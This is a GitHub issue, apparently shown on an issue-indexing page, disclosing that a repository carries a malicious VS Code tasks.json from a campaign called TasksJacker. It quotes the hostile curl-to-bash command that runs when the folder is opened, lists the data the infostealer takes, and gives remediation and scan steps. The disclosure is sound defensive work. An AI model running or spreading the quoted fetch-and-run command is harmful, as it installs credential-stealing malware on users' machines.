hackforla / hackforla/knowledgebase-content
Security: Repository contains malicious .vscode/tasks.json (TasksJacker campaign)
- Vorherrschende Sprache
- Keine Sprachdaten
- Sterne
- 2
- Forks
- 1
- PR-Merge-Kennzahlen
- Keine gemergten PRs in 30 T.
Beschreibung
## Security Disclosure: This repository has been compromised
The repository **hackforla/knowledgebase-content** was compromised on **February 9, 2026** by the **TasksJacker** campaign — a DPRK-linked supply chain attack. A malicious `.vscode/tasks.json` file was injected that automatically executes malware when anyone opens this repository in VS Code.
**This is not spam.** This disclosure is from the [OpenSourceMalware.com](https://opensourcemalware.com) research team, which first identified and published research on this campaign.
### Compromised file
- **`.vscode/tasks.json`** — contains a task with `"runOn": "folderOpen"` trigger
### What the malicious file does
The `tasks.json` silently executes `curl https://260120.vercel.app/... | bash` when the folder is opened in VS Code. The payload is a multi-stage infostealer and backdoor targeting:
- Browser credentials and cookies
- Cryptocurrency wallet data
- SSH keys and Git credentials
- AWS/cloud credentials and API tokens
### Why this matters for hackforla
As a civic tech organization with community volunteers, any contributor who has cloned and opened this repo in VS Code may have been compromised. We recommend notifying your contributors.
### Immediate remediation steps
1. **Delete `.vscode/tasks.json`** from this repository
2. **Force-push** to remove it from git history
3. **Rotate credentials**: The GitHub account credentials used to push to this repo were compromised — rotate PATs, SSH keys, and passwords
4. **Enable 2FA** on all accounts with push access
5. **Notify contributors** who may have cloned this repo between Feb 9 and now
6. **Scan machines** of anyone with push access:
```bash
ps aux | grep "\.vscode.*node"
ls -la ~/.vscode/node-v*-*/
```
### More information
- Full technical analysis: https://opensourcemalware.com/blog/tasksjacker
- Campaign scope: 354+ repositories across 229+ accounts compromised
- Attribution: DPRK-affiliated threat actors (medium-high confidence)
---
*Disclosed by the [OpenSourceMalware.com](https://opensourcemalware.com) research team.*
Beitragsleitfaden
Rechercherichtung
Start by inspecting .vscode/tasks.json and reading the linked TasksJacker analysis. Use the disclosure's remediation list to verify removal from the repository and history, credential rotation, 2FA, contributor notification, and scans of affected machines.
Vom Indexierungsmodell aus dem Issue-Text verfasst.
Bewertung
- Tech-Stack
- git, vscode
- Bereich
- security
- Issue-Typ
- Bug
- Schwierigkeit
- 5/5
- Geschätzter Aufwand
- Über eine Woche
- Aktivitätsstatus
- Veraltet
- Klarheit
- Klar beschrieben
- Anfängerfreundlichkeit
- 20/100